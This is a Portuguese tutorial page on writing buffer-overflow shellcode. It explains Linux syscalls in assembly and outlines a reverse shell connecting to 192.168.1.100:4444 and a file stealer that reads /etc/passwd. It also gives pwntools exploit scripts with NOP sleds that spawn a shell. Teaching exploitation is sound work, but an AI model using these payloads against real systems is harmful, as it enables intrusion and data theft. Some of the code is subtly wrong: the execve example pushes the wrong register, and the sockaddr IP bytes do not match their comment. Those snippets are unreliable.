Buffer Overflow - Shellcode

Shellcode é um pequeno trecho de código em Assembly usado como payload (carga útil) em um ataque. O código é muito pequeno por ser em assembly, portanto apenas poucos bytes são necessários, dependendo do shellcode.

Com shellcode, fazemos o programa rodar funcionalidades que o programador não escreveu. Normalmente, shellcode é utilizado para fazer uma chamada de API do Windows ou Syscall no Linux.

No C, estaríamos fazendo algo como:

int main() {
    system("/bin/sh"); // Chama shell
    return 0;
}

O Shellcode é a versão compacta disso, em assembly, que pode ser injetada na memória através de um input. Ou seja, Shellcode é código Assembly normal, nada especial. É chamado de shellcode pois geralmente envolve abrir uma shell (interface entre usuário e serviços do sistema operacional, algo como o prompt de comando do Windows).

A razão pela qual Shellcode funciona é por que o computador não diferencia dados e instruções. Não importa onde ou como você fala para rodar, o computador VAI tentar rodar. Assim, colocamos o shellcode na Stack e falamos para a RIP executar aquilo.

O que colocar no shellcode?

Podemos escrever várias coisas em assembly que são úteis como código injetável. Entre elas, temos:

Syscall (Linux/Unix) - O mais comum. Fazemos chamadas diretas ao kernel via instrução syscall / int 0x80. É simples, não depende de bibliotecas específicas e permite acessar todas as funcionalidades do Kernel.
ROP (Return-Oriented Programming) - Reutilizar códigos do próprio programa encadeados para ação maliciosa
Chamada de API Windows - Usamos as APIs do SO Windows ao invés de syscalls, pois as syscalls do Windows não são públicas.
Exploração de Browser - JavaScript/WebAssembly que explora vulnerabilidades no renderizador. Tende a ser bem complexo, pois explora bugs no motor do JS.

Iremos focar em Syscalls e ROP.

Syscalls

Syscalls são interfaces de fácil uso que permitem que programas solicitem serviços do kernel do sistema operacional, como acesso a hardware, criação de processos, gerenciamento de arquivos, etc. Para fazer uma syscall damos o número da syscall (operação que queremos), os argumentos e em seguida usamos o comando syscall (x64) / int 0x80 (x86), como vemos abaixo.

;x86-64

mov rax, syscall_number  ; Número da syscall
mov rdi, arg1            ; Primeiro argumento
mov rsi, arg2            ; Segundo argumento
mov rdx, arg3            ; Terceiro argumento
mov r10, rcx             ; Quarto argumento (rcx não usado)
mov r8, r8               ; Quinto argumento
mov r9, r9               ; Sexto argumento
syscall                  ; Instrução para chamar o kernel

; x86

mov eax, syscall_number  ; Número da syscall
mov ebx, arg1            ; Primeiro argumento
mov ecx, arg2            ; Segundo argumento
mov edx, arg3            ; Terceiro argumento
int 0x80                 ; Interrupção para chamar o kernel

Vamos falar de algumas syscalls importantes.

execve - Executar Shell/programa

Código para cada arquitetura:

x86 - 11
x64 - 59

; Executa Execve("/bin/sh", NULL, NULL)
mov rax, 59           ; syscall número 59 = execve

mov rdi, 0x68732f6e69622f2f ; arg1: pathname = "/bin/sh"
push rbx
mov rdi, rsp

xor rsi, rsi          ; arg2: argv = NULL
xor rdx, rdx          ; arg3: envp = NULL
syscall

A função Execve espera um ponteiro para uma string, não a string. Portanto, colocamos ela na stack primeiro. Quando damos push, rsp contém o ponteiro para a string.

File Descriptors (fd)

File Descriptor é um número que representa um arquivo aberto. STDIN, STDOUT, STDERR são padrões do sistema, e os fd's de arquivos e sockets são atribuídos conforme necessidade.

STDIN (0) → Para RECEBER coisas. Normalmente teclado.
STDOUT (1) → Para ENVIAR coisas. Normalmente tela/monitor.
STDERR (2) → Para RECLAMAR de erros. Normalmente tela/monitor.
Arquivo (X) → Para arquivo específico criado.
Socket (X) → Para socket criado que permite se comunicar pela internet.

write - Saída/Escrita

Código para cada arquitetura:

x86 - 4
x64 - 1

; Escreve em arquivo/socket
mov rax, 1       ; write
mov rdi, 1       ; fd (1=stdout, 4=socket)
lea rsi, [msg]   ; buffer
mov rdx, len     ; tamanho
syscall

Exemplo:

; write("Hello\n", 6)
mov rax, 1       ; syscall 1 = write
mov rdi, 1       ; fd = STDOUT
mov rsi, hello   ; string
mov rdx, 6       ; length
syscall          ; chamada

hello: db 'Hello', 0x0a

read - Entrada/Leitura

Código para cada arquitetura:

x86 - 3
x64 - 0

; Lê de entrada/socket
mov rax, 0       ; read
mov rdi, 0       ; fd (0=stdin, 4=socket)
lea rsi, [buf]   ; buffer
mov rdx, 1024    ; tamanho máximo
syscall

Exemplo:

section .bss
    buffer resb 100    ; Reserva 100 bytes

section .text
global _start
_start:
    mov rax, 0         ; read syscall
    mov rdi, 0         ; fd 0 = stdin (teclado)
    lea rsi, [buffer]  ; onde guardar
    mov rdx, 100       ; ler até 100 bytes
    syscall
    
    ; Agora [buffer] tem o que usuário digitou

open - Abrir arquivos

Código para cada arquitetura:

x86 - 5
x64 - 2

; Abre arquivo
mov rax, 2       ; open
lea rdi, [path]  ; caminho
xor rsi, rsi     ; flags=O_RDONLY
syscall
mov [file_fd], rax

Exemplo:

section .data
    filename db '/etc/passwd', 0

section .text
global _start
_start:
    mov rax, 2         ; open syscall
    lea rdi, [filename]; nome do arquivo
    mov rsi, 0         ; O_RDONLY = apenas leitura
    syscall            ; retorna fd em rax
    mov rbx, rax       ; Salvar fd em rbx, pois rax será sobrescrito
    
    ; rbx contém agora o file descriptor (número do arquivo), que pode ser utilizado em outras funções

exit - Saída controlada

Código para cada arquitetura:

x86 - 1
x64 - 60

; Sai sem crash
mov rax, 60      ; exit
mov rdi, 0     ; status=0 (sucesso)
syscall

dup2 - Redirecionamento

O dup2 redireciona entrada/saída. Se fazemos dup2(socket_fd, 1), isso é igual a dizer: "Quando o programa escrever na tela (1), na verdade escreva no socket (socket_fd)".

Código para cada arquitetura:

x86 - 63
x64 - 33

; Redireciona fd para outro
mov rax, 33      ; dup2(old_fd, new_fd)
mov rdi, rbx       ; socket fd criado
mov rsi, 0       ; STDIN
syscall

socket + connect - Reverse Shell

Imagine a internet como um sistema postal. Criar um socket é criar um "envelope" para a sua carta.

mov rax, 41        ; syscalkl 41 = socket
mov rdi, 2         ; "Quero um envelope para carta normal" (AF_INET = internet)
mov rsi, 1         ; "Com entrega garantida" (SOCK_STREAM = TCP)
mov rdx, 0         ; "Método padrão de entrega"
syscall            ; Retorna: "Aqui está seu envelope número X salvo em rax"
mov rbx, rax       ; Salva número do socket e rbx, pois rax será sobrescrito

Código para cada arquitetura:

Socket x86 - 102
Socket x64 - 41

Fazer connect é como enviar essa carta.

mov rax, 42        ; syscall 42 = connect
mov rdi, rbx         ; "Usando este envelope número X" (socket_fd criado antes)
lea rsi, [endereco]; "Para este endereço específico"
mov rdx, 16        ; "Tamanho padrão de endereço"
syscall            ; *Correio pega a carta*

; O endereço (struct sockaddr)
sockaddr:
dw 2                  ; Mandamos para a internet (AF_INET) - 2 bytes
dw 0x5c11             ; Porta 4444 = 0x115c (network byte order) - 2 bytes
dd 0xc0a80164         ; IP 192.168.1.100 = 0x64.0x01.0xa8.0xc0 - 4 bytes
times 8 db 0          ; A struct precisa ter 16 bytes. Preenchemos 8 vezes o número 0x0 (8 bytes de padding)

Código para cada arquitetura:

Connect x86 - 3
Connect x64 - 42

Com socket e connect, estabelecemos uma conexão. Para enviar dados, por exemplo, temos que usar write: write(socket_fd, [dados], tamanho)

Combinações de Syscalls

Abrir Shell / Backdoor simples

execve

Reverse Shell

socket() - cria socket
connect() - conecta ao atacante
dup2() - redireciona STDIN/OUT/ERR para socket
execve() - executa /bin/sh

File Stealer

open() - abre arquivo
read() - lê conteúdo
write() - escreve para socket/arquivo

Outras Syscalls

Para ver cada syscall, seu código, parâmetros e o que faz, recomendo olhar a Tabela de Syscalls para kernel Linux.

Outros materiais também estão disponíveis na internet:

NOPs

NOP (no operation) é uma isntrução do assembly que faz exatamente o que parece: nada. Ela apenas roda a próxima instrução. Isso é muito bom para shellcodes, pois nos permite ter uma grande margem de erro para acertar onde começa a execução do shellcode. Em assembly a instrução é nop, e em bytes, 0x90.

Assim, se quisermos fazer um shellcode com NOPs de padding:

from pwn import *

context.binary = ELF('./program')

p = process()

payload = b'\x90' * 240                 # NOPs
payload += asm(shellcraft.sh())         # shellcode
payload = payload.ljust(312, b'A')      # Padding
payload += p32(0xffffcfb4 + 120)        # endereço do buffer + metade da largura dos nops (margem de erro)

log.info(p.clean())
p.sendline(payload)
p.interactive()

Tome cuidado, pois NOPs podem ter um byte diferente em outras arquiteturas. Assim, você pode usar nop = asm(shellcraft.nop()).

Criando um Shellcode

Antes de criar o shellcode, vamos montar um programa para testar shellcode em C:

void (*shellcode)() = "[insira seu shellcode aqui]";

int main(void) {
    (*shellcode)();
    return 0;
}

Esse programa deve ser compilado com as flags:

-z execstack - Torna a pilha (stack) executável no binário compilado. Permite executar shellcode (desativa NX/DEP).
-Wno-incompatible-pointer-types - Desabilita o warning específico sobre conversões de ponteiros incompatíveis, já que estamos fazendo um macete para executar o shellcode.
-m32 - Define arquitetura de 32-bit.

Assim, compilamos com: gcc testador.c -o testador -z execstack -Wno-incompatible-pointer-types -m32

Agora vamos criar um Shellcode básico em assembly que simula a função exit() em C com o parâmetro 10 (isso faz o programa encerrar mostrando o código de status 10). Vamos salvar o programa como exit.asm.

    section .text     ; Define que essa região do código é para as instruções
    global _start     ; Define que o programa começa por _start

_start:
    mov eax, 1        ; eax ( código da syscall ) = 1 ( exit )
    mov ebx, 10       ; ebx ( parâmetro da syscall ) = 10
    int 0x80          ; Chama a syscall ( exit(10) )

Para compilarmos esse programa, usaremos o nasm e para linkar o objeto montado pelo nasm, usaremos o ld.

nasm -f elf32 exit.asm -o exit.o
ld -m elf_i386 exit.o -o exit

Podemos executar o programa com ./exit e ver o código de saída do programa com echo $?. Assim, vemos que o programa realmente encerra com o número 10.

O programa, após compilado, vira bytes em disco. Esses bytes de instrução são nosso shellcode. Para pegar os bytes do programa em disco, usamos objdump -D exit:

exit:     file format elf32-i386

Disassembly of section .text:

08049000 <_start>:
 8049000:       b8 01 00 00 00          mov    $0x1,%eax
 8049005:       bb 0a 00 00 00          mov    $0xa,%ebx
 804900a:       cd 80                   int    $0x80

No meio temos os bytes, na direita as respectivas instruções. Portanto, os bytes do programa são:

b8 01 00 00 00
bb 0a 00 00 00
cd 80

Colocando eles no nosso testador:

void (*shellcode)() = "\xb8\x01\x00\x00\x00\xbb\x0a\x00\x00\x00\xcd\x80";

int main(void) {
    (*shellcode)();
    return 0;
}

Compilando e executando:

./testador
echo $?

Podemos ver que o código de saída é 10, como esperado.

ShellCode + pwntools

O pwntools possui a ferramenta shellcraft, que tem shellcodes prontos para uso. O shellcode dado vai estar em assembly e temos que transformar em bytes usando a função asm().

O shellcraft possui inúmeros shellcodes prontos. Se quiser, veja Principais Funções Shellcraft. Abaixo, temos alguns shellcodes populares.

# Shellcodes prontos populares
shellcraft.sh()           # /bin/sh (Chama shell)
shellcraft.cat('file')    # cat file
shellcraft.dupsh()        # Duplica shell para fd
shellcraft.echo('text')   # Imprime texto
shellcraft.exit()         # Sai do processo

Como exemplo vamos fazer o mesmo código que fizemos antes de exit(10), mas no pwntools.

from pwn import *

# Gerar shellcode
shellcode = asm(shellcraft.exit(10))

# Ver bytes
print(f"Shellcode: {len(shellcode)} bytes")
print(hexdump(shellcode))

# Ver instruções
print("\nInstruções Assembly:")
print(disasm(shellcode))

# Executar (run_shellcode())
p = run_shellcode(shellcode)
p.interactive()

Sumário de uso BOF Shellcode

Basicamente:

Identifique se é possível fazer BOF
Coloque o Shellcode no Input + Padding até return address + Endereço do início do Shellcode na stack
Sim, acabamos de mandar o RIP executar instrução na stack.

Exemplo com pwntools, abrindo uma shell (shellcraft.sh()):

from pwn import *

context.binary = ELF('./program')

p = process()

payload = asm(shellcraft.sh())          ## Shellcode
payload = payload.ljust(312, b'A')      ## Padding
payload += p32(0xffffcfb4)              ## Endereço do Shellcode

log.info(p.clean())

p.sendline(payload)

p.interactive()

O que colocar no shellcode?​

Syscalls​

execve - Executar Shell/programa​

File Descriptors (fd)​

write - Saída/Escrita​

read - Entrada/Leitura​

open - Abrir arquivos​

exit - Saída controlada​

dup2 - Redirecionamento​

socket + connect - Reverse Shell​

Combinações de Syscalls​

Outras Syscalls​

NOPs​

Criando um Shellcode​

ShellCode + pwntools​

Sumário de uso BOF Shellcode​

O que colocar no shellcode?

Syscalls

execve - Executar Shell/programa

File Descriptors (fd)

write - Saída/Escrita

read - Entrada/Leitura

open - Abrir arquivos

exit - Saída controlada

dup2 - Redirecionamento

socket + connect - Reverse Shell

Combinações de Syscalls

Outras Syscalls

NOPs

Criando um Shellcode

ShellCode + pwntools

Sumário de uso BOF Shellcode